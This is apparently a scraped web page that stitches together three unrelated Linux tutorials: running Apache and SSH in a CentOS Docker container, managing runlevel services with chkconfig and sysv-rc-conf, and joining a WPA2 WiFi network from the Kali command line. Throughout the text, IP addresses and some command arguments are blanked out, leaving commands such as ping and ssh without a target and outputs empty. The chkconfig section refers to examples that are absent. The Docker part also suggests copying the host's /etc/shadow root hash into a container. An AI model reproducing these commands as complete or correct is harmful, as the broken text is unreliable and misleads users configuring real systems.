There are many available images. We want to practice with CentOS. This is a good starting point. An official repository is available, and it lists all the supported images and tags. Indeed, at this point, we need to understand how Docker images are labeled.

The naming convention is repository:tag, for example centos:latest. In other words, we want the latest CentOS image. But the require image might as well be centos:6.6. All right, let’s do it.

Pulling image

Now let’s list the images by running the docker images command:


Start a Docker container

As we’ve seen in my original tutorial, the simplest example is to run a shell:

docker run -ti centos:centos7 /bin/bash

So what do we have here? We are running a new container instance with its own TTY (-t) and STDIN (-i), from the CentOS 7 image, with a BASH shell. With a few seconds, you will get a new shell inside the container. Now, it’s a very basic, very stripped-down operating system, but you can start building things inside it.

Run container

Container running top

Install Apache & SSH

Let’s setup a Web server, which will also have SSH access. To this end, we will need to do some rather basic installations. Grab Apache (httpd) and SSHD (openssh-server), and configure them. This has nothing to do with Docker, per se, but it’s a useful exercise.

How, some of you may clamor, wait, you don’t need SSH inside a container, it’s a security risk and whatnot. Well, maybe, yes and no, depending on what you need and what you intend to use the container for. But let’s leave the security considerations aside. The purpose of the exercise is to learn how to setup and run ANY service.

Start service

You might want to start your Apache using an init script or a systemd command. This will not quite work. Specifically for CentOS, it comes with systemd, but more importantly, the container does not have its own systemd. If you try, the commands will fail.

systemctl start httpd
Failed to get D-Bus connection: No connection to service manager.

There are hacks around this problem, and we will learn about some of these in a future tutorial. But in general, given the lightweight and simple nature of containers, you do not really need a fully fledged startup service to run your processes. This does add some complexity.

Apache service

To run Apache (HTTPD), just execute /usr/sbin/httpd – or an equivalent command in your distro. The service should start, most likely with a warning that you have not configured your ServerName directive in httpd.conf. We have learned how to do this in my rather extensive Apache guide.

AH00558: httpd: Could not reliably determine the server’s fully qualified domain name, using Set the ‘ServerName’ directive globally to suppress this message

SSH service

With SSHD, run /usr/sbin/sshd.

/usr/sbin/sshd -f /etc/ssh/sshd_config
Could not load host key: /etc/ssh/ssh_host_rsa_key
Could not load host key: /etc/ssh/ssh_host_dsa_key
Could not load host key: /etc/ssh/ssh_host_ecdsa_key
Could not load host key: /etc/ssh/ssh_host_ed25519_key

You will also fail, because you won’t have all the keys. Normally, startup scripts take of this, so you will need to run the ssh-keygen command once before the service starts correctly. Either one of the two commands will work:

/usr/bin/ssh-keygen -t rsa -f <path to file>

/usr/bin/ssh-keygen -A
ssh-keygen: generating new host keys: RSA1 RSA DSA ECDSA ED25519

Check if Web server is up

Now, inside the container, we can see that Apache is indeed running.

ps -ef|grep apache
apache      87    86  0 10:47 ?        00:00:00 /usr/sbin/httpd
apache      88    86  0 10:47 ?        00:00:00 /usr/sbin/httpd
apache      89    86  0 10:47 ?        00:00:00 /usr/sbin/httpd
apache      90    86  0 10:47 ?        00:00:00 /usr/sbin/httpd
apache      91    86  0 10:47 ?        00:00:00 /usr/sbin/httpd

But what if we want to check external connectivity? At this point, we have a couple of problems at our hand. One, we have not setup any open ports, so to speak. Two, we do not know what the IP address of our container is. Now, if you try to run the ifconfig inside the BASH shell, you won’t get anywhere, because the necessary package containing the basic networking commands is not installed. Good, because it makes our container slim and secure.

Expose incoming ports

Like with any Web server, we will need to allow incoming connections. We will use the default port 80. This is no different than port forwarding in your router, allowing firewall policies and whatnot. With Docker, there are several ways you can achieve the desired result.

When starting a new container with the run command, you can use -p option to specify which ports to open. You can choose a single port or a range of ports, and you can also map both the host port (hostPort) and container port (containerPort). For instance:

  • -p 80 will expose container port 80. It will be automatically mapped to a random port on the host. We will learn later on how to identify the correct port.
  • -p 80:80 will map the container port to the host port 80. This means you do not need to know the internal IP address of the container. There is an element of internal NAT involved, which goes through the Docker virtual interface. We will discuss this soon. Moreover, if you use this method, only a single container will be able to bind to port 80. If you want to use multiple Web servers with different IP addresses, you will have to set them up each on a different port.

docker run -ti -p 22:22 -p 80:80 image-1:latest
FATA[0000] Error response from daemon: Cannot start container 64bd520e2d95a699156f5d40331d1aba972039c3c201a97268d61c6ed17e1619: Bind for failed: port is already allocated

There are many additional considerations. IP forwarding, bridged networks, public and private networks, subnet ranges, firewall rules, load balancing, and more. At the moment, we do not need to worry about these.

There is also an additional method of how we can expose port, but we will discuss that later on, when we touch on the topic of Dockerfiles, which are templates for building new images. For now, we need to remember to run our images with the -p option.

Check IP address

If you want to leave your host ports free, then you can omit the hostPort piece. In that case, you can connect to the container directly, using its IP address and Web server port. To do that, we need to figure our the container details:

docker inspect <container name or ID>

This will give a very long list of details, much like the KVM XML config, except this one is written in JSON, which is another modern and ugly format for data. Readable but extremely ugly.

docker inspect distracted_euclid
“AppArmorProfile”: “”,
“Args”: [],
“Config”: {
“AttachStderr”: true,
“AttachStdin”: true,
“AttachStdout”: true,
“Cmd”: [
“CpuShares”: 0,
“Cpuset”: “”,
“Domainname”: “”,
“Entrypoint”: null,
“Env”: [

“ExposedPorts”: {
“80/tcp”: {}
“Hostname”: “43b179c5aec7”,
“Image”: “centos:centos7”,
“Labels”: {},
“MacAddress”: “”,

We can narrow it down to just the IP address.

docker inspect <container name or ID> | grep -i “ipaddr”
“IPAddress”: “”,

Testing new configuration

Let’s start fresh. Launch a new instance, setup Apache, start it. Open a Web browser and test. If it works, then you have properly configured your Web server. Exactly what we wanted.

docker run -it -p 80:80 centos:centos7 /bin/bash

If we check the running container, we can see the port mapping – the output is split over multiple lines for brevety, so please excuse that. Normally, the all-uppercase titles will show as the row header, and then, you will get all the rest printed below, one container per line.

# docker ps
CONTAINER ID        IMAGE               COMMAND
43b179c5aec7        centos:centos7      “/bin/bash”

CREATED             STATUS              PORTS
2 hours ago         Up 2 hours>80/tcp

NAMES               distracted_euclid

And in the browser, we get:

Web server running

Optional: Now, the internal IP address range will only be accessible on the host. If you want to make it accessible from other machines, you will need your NAT and IP forwarding. And if you want to use names, then you will need to properly configure the /etc/hosts as well as DNS. For container, this can be done using the –add-host=”host:IP” directive when running a new instance.

Another note: Remember that Docker has its own internal networking, much like VirtualBox and KVM, as we’ve seen in my other tutorials. It’s a fairly extensive /16 network, so you have quite a lot of freedom. On the host:

# /sbin/ifconfig
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
inet  netmask  broadcast
inet6 fe80::5484:7aff:fefe:9799  prefixlen 64  scopeid 0x20<link>
ether 56:84:7a:fe:97:99  txqueuelen 0  (Ethernet)
RX packets 6199  bytes 333408 (325.5 KiB)
RX errors 0  dropped 0  overruns 0  frame 0
TX packets 11037  bytes 32736299 (31.2 MiB)
TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Check if SSH works

We need to do the same exercise with SSH. Again, this means exposing port 22, and we have several options available. To make it more interesting, let’s try with a random port assignment:

docker run -ti -p 20 -p 80 centos:centos7 /bin/bash

And if we check with docker ps, specifically for ports:>22/tcp,>80/tcp   boring_mcclintock

This means you can connect to the docker0 IP address, ports as specified above in the docker ps command output, and this equivalent to actually connecting to the container IP directly, on their service port. This can be useful, because you do not need to worry about the internal IP address that your container uses, and it can simplify forwarding. Now, let’s try to connect. We can use the host port, or we can use the container IP directly.

ssh -p 49117

Either way, we will get what we need, for instance:

The authenticity of host ‘ (’ can’t be established. ECDSA key fingerprint is 00:4b:de:91:60:e5:22:cc:f7:89:01:19:3e:61:cb:ea.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘’ (ECDSA) to the list of known hosts.
root@’s password:

Wait, what is the root password?

We will fail because we do not have the root password. So what do we do now? Again, we have several options. First, try to change the root password inside the container using the passwd command. But this won’t work, because the passwd utility is not installed. We can then grab the necessary RPM and set it up inside the container. On the host, check the dependencies:

rpm -q –whatprovides /etc/passwd

But this is a security vulnerability. We want our containers to be lean. So we can just copy the password hash from /etc/shadow on the host into the container. Later, we will learn about a more streamlined way of doing it.

Another thing that strikes quite clearly is that we are repeating all our actions. This is not efficient, and this is why we want to preserve changes we have done to our container. The next section handles that.

SSH success

Commit image

After you’ve made changes to the container, you may want to commit it. In other words, when starting a new container later on, you will not need to repeat all the steps from scratch, you will be able to reuse your existing work and save time and bandwidth. You can commit an image based on its ID or its alias:

docker commit <container name or ID> <new image>

For example, we get the following:

docker commit 43b179c5aec7 myapache3

Commit image

Check the list of images again:

Image committed


A more streamlined way of creating your images is to use Dockerfiles. In a way, it’s like using Makefile for compilation, only in Docker format. Or an RPM specfile if you will. Basically, in any one “build” directory, create a Dockerfile. We will learn what things we can put inside one, and why we want it for our Apache + SSH exercise. Then, we will build a new image from it. We can combine it with our committed images to preserve changes already done inside the container, like the installation of software, to make it faster and save network utilization.

Before we go any further, let’s take a look at a Dockerfile that we will be using for our exercise. At the moment, the commands may not make much sense, but they soon will.

FROM myhttptest2:latest


CMD [“/usr/sbin/sshd”, “-D”]


RUN mkdir -p /run/httpd
CMD [“/usr/sbin/httpd”, “-D”, “FOREGROUND”]

What do we have here?

  • The FROM directory tells us what repo:tag to use as the baseline. In our case, it’s one of the committed images that already contains the httpd and sshd binaries, SSH keys, and a bit more.
  • EXPOSE 22 – This line exposes port 22 inside the container. We can map it further using the -p option at runtime. The same is true for EXPOSE 80, which is relevant for the Web server.
  • CMD [“/usr/sbin/sshd”, “-D”] – This instructions runs an executable, with optional arguments. It is as simple as that.
  • RUN mkdir -p /run/httpd – This instruction runs a command in a new layer on top of the base image – and COMMITS the results. This is very important to remember, as we will soon discuss what happens if you don’t use the RUN mkdir thingie with Apache.
  • CMD [“/usr/sbin/httpd”, “-D”, “FOREGROUND”] – We run the server, in the foreground. The last bit is optional, but for the time being, you can start Apache this way. Good enough.

As you can see, Dockerfiles aren’t that complex or difficult to write, but they are highly useful. You can pretty much add anything you want. Using these templates form a basis for automation, and with conditional logic, you can create all sorts of scenarios and spawn containers that match your requirements.

Build image

Once you have a Dockerfile in place, it’s time to build a new image. Dockerfiles must follow a strict convention, just like Makefiles. It’s best to keep different image builds in separate sub-directories. For example:

docker build -t test5 .
Sending build context to Docker daemon 41.47 kB
Sending build context to Docker daemon
Step 0 : FROM myapache4:latest
—> 7505c70235e6
Step 1 : EXPOSE 22 80
—> Using cache
—> 58f11217c3e3
Step 2 : CMD /usr/sbin/sshd -D
—> Using cache
—> 628c3d6b5399
Step 3 : RUN mkdir -p /run/httpd
—> Using cache
—> 5fc118f61a4d
Step 4 : CMD /usr/sbin/httpd -D FOREGROUND
—> Using cache
—> d892acd86198
Successfully built d892acd86198

The command tells us the following: -t repository name from a Dockerfile stored in the current directory (.). That’s all. Very simple and elegant.

Test image

Run a new container from the created image. If everything went smoothly, you should have both SSH connectivity, as well as a running Web server in place. Again, all the usual network related rules apply.

Running successfully, built from Dockerfile

Alternative build

Once you have the knowledge how do it on your own, you can try one of the official Apache builds. Indeed, the Docker repository contains a lot of good stuff, so you should definitely invest time checking available templates. For Apache, you only need the following in your Dockerfile – the second like is optional.

FROM httpd:2.4
COPY ./public-html/ /usr/local/apache2/htdocs/

COPY instruction

What do we have above? Basically, in the Dockerfile, we have the declaration what template to use. And then, we have a COPY instructions, which will look for a public-html directory in the current folder and copy it into the container during the build. In the same manner, you can also copy your httpd.conf file. Depending on your distribution, the paths and filenames might differ. Finally, after building the image and running the container:

docker run -ti -p 22 -p 80 image-1:latest
AH00558: httpd: Could not reliably determine the server’s fully qualified domain name, using Set the ‘ServerName’ directive globally to suppress this message
[Thu Apr 16 21:08:35.967670 2015] [mpm_event:notice] [pid 1:tid 140302870259584] AH00489: Apache/2.4.12 (Unix) configured — resuming normal operations
[Thu Apr 16 21:08:35.976879 2015] [core:notice] [pid 1:tid 140302870259584] AH00094: Command line: ‘httpd -D FOREGROUND’

Default HTTPD works

Advantages of containers

There are many good reasons why you want to use this technology. But let’s just briefly focus on what we gain by running these tiny, isolated instances. Sure, there’s a lot happening under the hood, in the kernel, but in general, the memory footprint of spawned containers is fairly small. In our case, the SSH + Apache containers use a tiny fraction of extra memory. Compare this to any virtualization technology.

Container memory

Low memory usage

Problems you may encounter & troubleshooting

Let’s go back to the Apache example, and now you will also learn why so many online tutorials sin the sin of copy & pasting information without checking, and why most of the advice is not correct, unfortunately. It has to do with, what do you do if your Apache server seems to die within a second or two after launching the container? Indeed, if this happens, you want to step into the container and troubleshoot. To that end, you can use the docker exec command to attach a shell to the instance.

docker exec -ti boring_mcclintock /bin/bash

Then, it comes down to reading logs and trying to figure out what might have gone wrong. If your httpd.conf is configured correctly, you will have access and error logs under /var/log/httpd:

[auth_digest:error] [pid 25] (2)No such file or directory: AH01762: Failed to create shared memory segment on file /run/httpd/authdigest_shm.25

A typical problem is that you may be a missing /run/httpd directory. If this one does not exist in your container, httpd will start and die. Sounds so simple, but few if any reference mentions this.

While initially playing with containers, I did encounter this issue. Reading online, I found several suggestions, none of which really helped. But I do want to elaborate on them, and how you can make progress in your problem solving, even if intermediate steps aren’t really useful.

Suggestion 1: You must use -D FOREGROUND to run Apache, and you must also use ENTRYPOINT rather than CMD. The difference between the two instructions is very subtle. And it does not solve our problem in any way.

ENTRYPOINT [“/usr/sbin/httpd”]

Suggestion 2: Use a separate startup script, which could work around any issues with the starting or restarting of the httpd service. In other words, the Dockerfile becomes something like this:

COPY ./ /
RUN chmod -v +x /
CMD [“/”]

And the contents of the script are along the lines of:


rm -rf /run/httpd/*

exec /usr/sbin/apachectl -D FOREGROUND

Almost there. Remove any old leftover PID files, but these are normally not stored under /run/httpd. Instead, you will find them under /var/run/httpd. Moreover, we are not certain that this directory exists.

Finally, the idea is to work around any problems with the execution of a separation shell inside which the httpd thread is spawned. While it does provide us with additional, useful lessons on how to manage the container, with COPY and RUN instructions, it’s not what we need to fix the issue.

Step 3 : EXPOSE 80
—> Using cache
—> 108785c8e507
Step 4 : COPY ./ /
—> 582d795d59d4
Removing intermediate container 7ff5b58b40bf
Step 5 : RUN chmod -v +x /
—> Running in 56fadf4dd2d4
mode of ‘/’ changed from 0644 (rw-r–r–) to 0755 (rwxr-xr-x)
—> 928640f680cf
Removing intermediate container 56fadf4dd2d4
Step 6 : CMD /
—> Running in f9c6b30795e2
—> b2dcc2818a27
Removing intermediate container f9c6b30795e2
Successfully built b2dcc2818a27

This won’t work, because apachectl is an unsupported command for managing httpd, plus we have seen problems using startup scripts and utilities earlier, and we will work on fixing this in a separate tutorial.

docker run -ti -p 80 image-2:latest
Passing arguments to httpd using apachectl is no longer supported. You can only start/stop/restart httpd using this script. If you want to pass extra arguments to httpd, edit the /etc/sysconfig/httpd config file.

But it is useful to try these different things, to get the hang of it. Unfortunately, it also highlights the lack of maturity and the somewhat inadequate documentation for this technology out there.

Additional commands

There are many ways you can interact with your container. If you do not want to attach a new shell to a running instance, you can use a subset of docker commands directly against the container ID or name:

docker <command> <container name or ID>

For instance, to get the top output from the container:

docker top boring_stallman

If you have too many images, some of which have just been used for testing, then you can remove them to free up some of your disk space. This can be done using the docker rmi command.

# docker rmi -f test7
Untagged: test7:latest
Deleted: d0505b88466a97b73d083434b2dd0e7b59b9a5e8d0438b1bf8c6c
Deleted: 5fc118f61bf856f6f3d90e0e71076b737fa7cc58cd56785ea7904
Deleted: 628c3d6b53992521c9c1fdda4148693347c3d10b1d130f7e091e7
Deleted: 58f11217c3e31206b4e41d07100a797cd4d17e4569b0fdb8b7a18
Deleted: 7505c70235e638c54028ea5b63eba2b691de6bee67c2cb5e2861a

Then, you can also run your containers in the background. Using the -d flag will do exactly that, and you will get the shell prompt back. This is also useful if you do not mask signals, so if you accidentally break in your shell, you might kill the container when it’s running in the foreground.

docker run -d -ti -p 80 image-3:latest

You can also check events, examine changes inside a container’s filesystem as well as check history, so you basically have a version control in place, export or import tarred images to and from remote locations, including over the Web, and more.

Differences between exec and attach

If you read through the documentation, you will notice you can connect to a running container using eitherexec or attach commands. So what’s the difference, you may ask? If we look at the official documentation, then:

The docker exec command runs a new command in a running container. The command started using docker exec only runs while the container’s primary process (PID 1) is running, and it is not restarted if the container is restarted.

On the other hand, attach gives you the following:

The docker attach command allows you to attach to a running container using the container’s ID or name, either to view its ongoing output or to control it interactively. You can attach to the same contained process multiple times simultaneously, screen sharing style, or quickly view the progress of your daemonized process. You can detach from the container (and leave it running) with CTRL-p CTRL-q (for a quiet exit) or CTRL-c which will send a SIGKILL to the container. When you are attached to a container, and exit its main process, the process’s exit code will be returned to the client.

In other words, with attach, you will get a shell, and be able to do whatever you need. With exec, you can issue commands that do not require any interaction, but with you use a shell in combination with exec, you will achieve the same result as if you used attach.

Differences between start and run

Start is used to resume the execution of a stopped container. It is not used to start a fresh instance. For that, you have the run command. The choice of words could have been better.

Differences between build and create

The first command is used to create a new image from a Dockerfile. On the other hand, the latter is used to create a new container using command line options and arguments. Create lets you specify container settings, too, like network configurations, resource limitations and other settings, which affect the container from the outside, whereas the changes implemented by the build command will be reflected inside it, once you start an instance. And by start, I mean run. Get it?

This is just a beginning …

There are a million more things we can do: using systemd enabled containers, policies, security, resource constraints, proxying, signals, other networking and storage options including the super-critical question of how to mount data volumes inside containers so that data does not get destroyed when containers die, additional pure LXC commands, and more. We’ve barely scratched the surface. But now, we know what to do. And we’ll get there. Slowly but surely.

More reading

I recommend you allocate a few hours and then spend some honest time reading all of the below, in detail. Then practice. This is the only way you will really fully understand and embrace the concepts.

Dockerizing an SSH Deamon Service

Differences between save and export in Docker

Docker Explained: Using Dockerfiles to Automate Building of Images


We’re done with this tutorial for today. Hopefully, you’ve found it useful. In a nutshell, it does explain quite a few things, including how to get started with Docker, how to pull new images, run basic containers, add services like SSH and Apache, commit changes to a file, expose incoming ports, build new images with Dockerfiles, lots of troubleshooting of problems, additional commands, and more. Eventful and colorful, I’d dare say.

In the future, we will expand significantly on what we learned here, and focus on various helper technologies like supervisord for instance, we will learn how to mount filesystems, work on administration and orchestration, and many other cool things. Docker is a very nice concept, and if used correctly, it can make your virtual world easier and more elegant. The initial few steps are rough, but with some luck, this guide will have provided you with the right dose of karma to get happily and confidently underway. Ping me if you have any requests or desires. Technology related, of course. We’re done.

Easily manage Linux services with chkconfig and sysv-rc-conf utilities

If you want to manage the services in your Linux distribution without manually hacking the scripts in runlevel directories, you may want to use the chkconfig and sysv-rc-conf utilities. chkconfig is used on RedHat-based distros, sysv-rc-conf is for Debian variants.

Follow me.


The utility is included by default with RedHat (and sons) and SUSE. This means that system administration is a simple affair on these distributions. All you have to do is learn the basic chkconfig syntax. The commands must be run as root.

chkconfig –levels <levels> <service> <switch>

What do we have here?

–levels <levels> defines the runlevels in which you want the particular service switch to be turned. The runlevels are listed one next to another without spaces, commas or any other delimiter. Simply a string of numbers, e.g. 34 – signifies runlevels 3 and 4.

<service> is the actual service we want enabled/disabled for the listed runlevels.

<switch> is on/off, meaning enabled/disabled service for the particular runlevels.

Let’s see a practical example:


Here, we turned the SSH service (daemon called sshd) off and on in runlevel 2. Simple, eh?

And we can also list all services using the –list flag:

chkconfig –list


Let’s see what sysv-rc-conf offers:


Let’s take a look on sysv-rc-conf on Ubuntu.

By default, the utility is not installed. We will install it via Synaptic.


The usage model is practically identical to chkconfig. The only difference is that sysv-rc-conf also has a text-based GUI. You can use a simple, table-like interface to manage services, using Spacebar to toggle their status (enable/disable), with letter X as the switch.


The other functions are identical, including –list and –levels:



One important thing: please note in the screenshot above that I’ve written ssh instead of sshd. This is a mistake, but there was no alert from the system. Indeed, both chkconfig and sysv-rc-conf will ignore your attempts for non-existent services, so pay attention to possible mistakes!

What do they do?

You may be asking yourselves what these tools do. Well, without getting too technical, I’ll try to portray a simple enough picture.

Using a classic model for example, Linux works in runlevels, sets of modes similar somewhat to Windows Safe mode with/without command prompt and/or networking. Runlevels define what runs when the system boots. Runlevel 1 is the maintenance mode, also known as single mode, with root access only and minimal shell. Runlevel 3 is the system level with networking and no GUI. Modern desktop distros usually boot in runlevel 5, which is the full system level, with networking and GUI. And so forth.

Definitions for what services should boot in each runlevel are listed under /etc/rcX.d/ directories, where X signifies the runlevel. Inside these directories, you will find scripts, starting with letter S and a two-digit number, e.g. S04somescript. These are the Start scripts for relevant services. Starting according to their number, from the lowest to the highest, the scripts are invoked and run on startup.

There is also a set of Kill scripts, which begin with K and are used to stop the services when the system is being shut down, rebooted or runlevels switched.

What the chkconfig and sysv-rc-conf do is merely create or remove these scripts from relevant directories. Simple and beautiful.

For more details, you may want to read the man pages.


Admining Linux systems is a serious, difficult task. You can do without the tedious, futile tasks like manually configuring scripts for the system services, worrying about spelling mistakes or bad syntax. Let the machine work hard, instead of you.

chkconfig and sysv-rc-conf are a must in the hands of even the most bored system administrator. They can greatly simplify the routine of properly configuring the systems for your environment.

Connect to WiFi Network From Command Line In Linux

How many of you failed to connect to WiFi network in Linux? Did you bumped into issues like the followings in different forums, discussion page, blogs? I am sure everyone did at some point. Following list shows just the results from Page 1 of a Google search result with “Unable to connect to WiFi network in Linux” keywords.Connect to WiFi network in Linux from command line - blackMORE Ops

  1. Cannot connect to wifi at home after upgrade to ubuntu 14.04
  2. Arch Linux not connecting to Wifi anymore
  3. I can’t connect to my wifi
  4. Cannot connect to WiFi
  5. Ubuntu 13.04 can detect wi-fi but can’t connect
  6. Unable to connect to wireless network ath9k
  7. Crazy! I can see wireless network but can’t connect
  8. Unable to connect to Wifi Access point in Debian 7
  9. Unable to connect Wireless

Following guide explains how you can connect to a WiFi network in Linux from command Line. This guide will take you through the steps for connecting to a WPA/WPA2 WiFi network.


  • WiFi network from command line – Required tools
  • Linux WPA/WPA2/IEEE 802.1X Supplicant
    • iw – Linux Wireless
    • ip – ip program in Linux
    • ping
  • Step 1: Find available WiFi adapters – WiFi network from command line
  • Step 2: Check device status – WiFi network from command line
  • Step 3: Bring up the WiFi interface – WiFi network from command line
  • Step 4: Check the connection status – WiFi network from command line
  • Step 5: Scan to find WiFi Network – WiFi network from command line
  • Step 6: Generate a wpa/wpa2 configuration file – WiFi network from command line
  • Step 7: Connect to WPA/WPA2 WiFi network – WiFi network from command line
  • Step 8: Get an IP using dhclient – WiFi network from command line
  • Step 9: Test connectivity – WiFi network from command line
  • Conclusion

WiFi network from command line – Required tools

Following tools are required to connect to WiFi network in Linux from command line

  1. wpa_supplicant
  2. iw
  3. ip
  4. ping

Before we jump into technical jargons let’s just quickly go over each item at a time.

Linux WPA/WPA2/IEEE 802.1X Supplicant

wpa_supplicant is a WPA Supplicant for Linux, BSD, Mac OS X, and Windows with support for WPA and WPA2 (IEEE 802.11i / RSN). It is suitable for both desktop/laptop computers and embedded systems. Supplicant is the IEEE 802.1X/WPA component that is used in the client stations. It implements key negotiation with a WPA Authenticator and it controls the roaming and IEEE 802.11 authentication/association of the wlan driver.

iw – Linux Wireless

iw is a new nl80211 based CLI configuration utility for wireless devices. It supports all new drivers that have been added to the kernel recently. The old tool iwconfing, which uses Wireless Extensions interface, is deprecated and it’s strongly recommended to switch to iw and nl80211.

ip – ip program in Linux

ip is used to show / manipulate routing, devices, policy routing and tunnels. It is used for enabling/disabling devices and it helps you to find general networking informations. ip was written by Alexey N. Kuznetsov and added in Linux 2.2. Use man ip to see full help/man page.


Good old ping For every ping, there shall be a pong …. ping-pong – ping-pong – ping-pong … that should explain it.

BTW man ping helps too …

Step 1: Find available WiFi adapters – WiFi network from command line

This actually help .. I mean you need to know your WiFi device name before you go an connect to a WiFi network. So just use the following command that will list all the connected WiFi adapters in your Linux machines.

root@kali:~# iw dev
    Interface wlan0
        ifindex 4
        type managed

Let me explain the output:

This system has 1 physical WiFi adapters.

  1. Designated name: phy#1
  2. Device names: wlan0
  3. Interface Index: 4. Usually as per connected ports (which can be an USB port).
  4. Type: Managed. Type specifies the operational mode of the wireless devices. managed means the device is a WiFi station or client that connects to an access point.

Connect to WiFi network in Linux from command line - Find WiFi adapters - blackMORE Ops-1

Step 2: Check device status – WiFi network from command line

By this time many of you are thinking, why two network devices. The reason I am using two is because I would like to show how a connected and disconnected device looks like side by side. Next command will show you exactly that.

You can check that if the wireless device is up or not using the following command:

root@kali:~# ip link show wlan0
4: wlan0: <BROADCAST,MULTICAST> mtu 1500 qdisc mq state DOWN mode DORMANT qlen 1000
    link/ether 00:60:64:37:4a:30 brd ff:ff:ff:ff:ff:ff

As you can already see, I got once interface (wlan0) as state UP and wlan1 as state DOWN.

Look for the word “UP” inside the brackets in the first line of the output.

Connect to WiFi network in Linux from command line - Check device status- blackMORE Ops-2

In the above example, wlan1 is not UP. Execute the following command to

Step 3: Bring up the WiFi interface – WiFi network from command line

Use the following command to bring up the WiFI interface

root@kali:~# ip link set wlan0 up

Note: If you’re using Ubuntu, Linux Mint, CentOS, Fedora etc. use the command with ‘sudo’ prefix

Connect to WiFi network in Linux from command line - Bring device up - blackMORE Ops-3

If you run the show link command again, you can tell that wlan1 is now UP.

root@kali:~# ip link show wlan0
4: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP mode DORMANT qlen 1000
    link/ether 00:60:64:37:4a:30 brd ff:ff:ff:ff:ff:ff

Step 4: Check the connection status – WiFi network from command line

You can check WiFi network connection status from command line using the following command

root@kali:~# iw wlan0 link
Not connected.

Connect to WiFi network in Linux from command line - Check device connection - blackMORE Ops-4

The above output shows that you are not connected to any network.

Step 5: Scan to find WiFi Network – WiFi network from command line

Scan to find out what WiFi network(s) are detected

root@kali:~# iw wlan0 scan
BSS 9c:97:26:de:12:37 (on wlan0)
    TSF: 5311608514951 usec (61d, 11:26:48)
    freq: 2462
    beacon interval: 100
    capability: ESS Privacy ShortSlotTime (0x0411)
    signal: -53.00 dBm 
    last seen: 104 ms ago
    Information elements from Probe Response frame:
    SSID: blackMOREOps
    Supported rates: 1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 
    DS Parameter set: channel 11
    ERP: Barker_Preamble_Mode
    RSN:     * Version: 1
         * Group cipher: CCMP
         * Pairwise ciphers: CCMP
         * Authentication suites: PSK
         * Capabilities: 16-PTKSA-RC (0x000c)
    Extended supported rates: 6.0 9.0 12.0 48.0 
---- truncated ----

The 2 important pieces of information from the above are the SSID and the security protocol (WPA/WPA2 vs WEP). The SSID from the above example is blackMOREOps. The security protocol is RSN, also commonly referred to as WPA2. The security protocol is important because it determines what tool you use to connect to the network.

— following image is a sample only —

Connect to WiFi network in Linux from command line - Scan Wifi Network using iw - blackMORE Ops - 5

Step 6: Generate a wpa/wpa2 configuration file – WiFi network from command line

Now we will generate a configuration file for wpa_supplicant that contains the pre-shared key (“passphrase“) for the WiFi network.

root@kali:~# wpa_passphrase blackMOREOps >> /etc/wpa_supplicant.conf
(where 'abcd1234' was the Network password)

wpa_passphrase uses SSID as a string, that means you need to type in the passphrase for the WiFi networkblackMOREOps after you run the command.

Connect to WiFi network in Linux from command line - Connect to WPA WPA2 WiFi network - blackMORE Ops - 6

Note: If you’re using Ubuntu, Linux Mint, CentOS, Fedora etc. use the command with ‘sudo’ prefix

wpa_passphrase will create the necessary configuration entries based on your input. Each new network will be added as a new configuration (it wont replace existing configurations) in the configurations file /etc/wpa_supplicant.conf.

root@kali:~# cat /etc/wpa_supplicant.conf 
# reading passphrase from stdin

Step 7: Connect to WPA/WPA2 WiFi network – WiFi network from command line

Now that we have the configuration file, we can use it to connect to the WiFi network. We will be usingwpa_supplicant to connect. Use the following command

root@kali:~# wpa_supplicant -B -D wext -i wlan0 -c /etc/wpa_supplicant.conf
ioctl[SIOCSIWENCODEEXT]: Invalid argument 
ioctl[SIOCSIWENCODEEXT]: Invalid argument 


  • -B means run wpa_supplicant in the background.
  • -D specifies the wireless driver. wext is the generic driver.
  • -c specifies the path for the configuration file.

Connect to WiFi network in Linux from command line - Connect to WPA WPA2 WiFi network - blackMORE Ops - 7

Use the iw command to verify that you are indeed connected to the SSID.

root@kali:~# iw wlan0 link
Connected to 9c:97:00:aa:11:33 (on wlan0)
    SSID: blackMOREOps
    freq: 2412
    RX: 26951 bytes (265 packets)
    TX: 1400 bytes (14 packets)
    signal: -51 dBm
    tx bitrate: 6.5 MBit/s MCS 0

    bss flags:    short-slot-time
    dtim period:    0
    beacon int:    100

Step 8: Get an IP using dhclient – WiFi network from command line

Until step 7, we’ve spent time connecting to the WiFi network. Now use dhclient to get an IP address by DHCP

root@kali:~# dhclient wlan0
Reloading /etc/samba/smb.conf: smbd only.

You can use ip or ifconfig command to verify the IP address assigned by DHCP. The IP address is below.

root@kali:~# ip addr show wlan0
4: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP qlen 1000
    link/ether 00:60:64:37:4a:30 brd ff:ff:ff:ff:ff:ff
    inet brd scope global wlan0
       valid_lft forever preferred_lft forever
    inet6 fe80::260:64ff:fe37:4a30/64 scope link 
       valid_lft forever preferred_lft forever


root@kali:~# ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr 00:60:64:37:4a:30 
 inet addr: Bcast: Mask:
 inet6 addr: fe80::260:64ff:fe37:4a30/64 Scope:Link
 RX packets:23868 errors:0 dropped:0 overruns:0 frame:0
 TX packets:23502 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000 
 RX bytes:22999066 (21.9 MiB) TX bytes:5776947 (5.5 MiB)


Add default routing rule.The last configuration step is to make sure that you have the proper routing rules.

root@kali:~# ip route show 
default via dev wlan0 dev wlan0  proto kernel  scope link  src 

Connect to WiFi network in Linux from command line - Check Routing and DHCP - blackMORE Ops - 8

Step 9: Test connectivity – WiFi network from command line

Ping Google’s IP to confirm network connection (or you can just browse?)

root@kali:~# ping
PING ( 56(84) bytes of data.
64 bytes from icmp_req=3 ttl=42 time=265 ms
64 bytes from icmp_req=4 ttl=42 time=176 ms
64 bytes from icmp_req=5 ttl=42 time=174 ms
64 bytes from icmp_req=6 ttl=42 time=174 ms
--- ping statistics ---
6 packets transmitted, 4 received, 33% packet loss, time 5020ms
rtt min/avg/max/mdev = 174.353/197.683/265.456/39.134 ms


This is a very detailed and long guide. Here is a short summary of all the things you need to do in just few line.

root@kali:~# iw dev
root@kali:~# ip link set wlan0 up
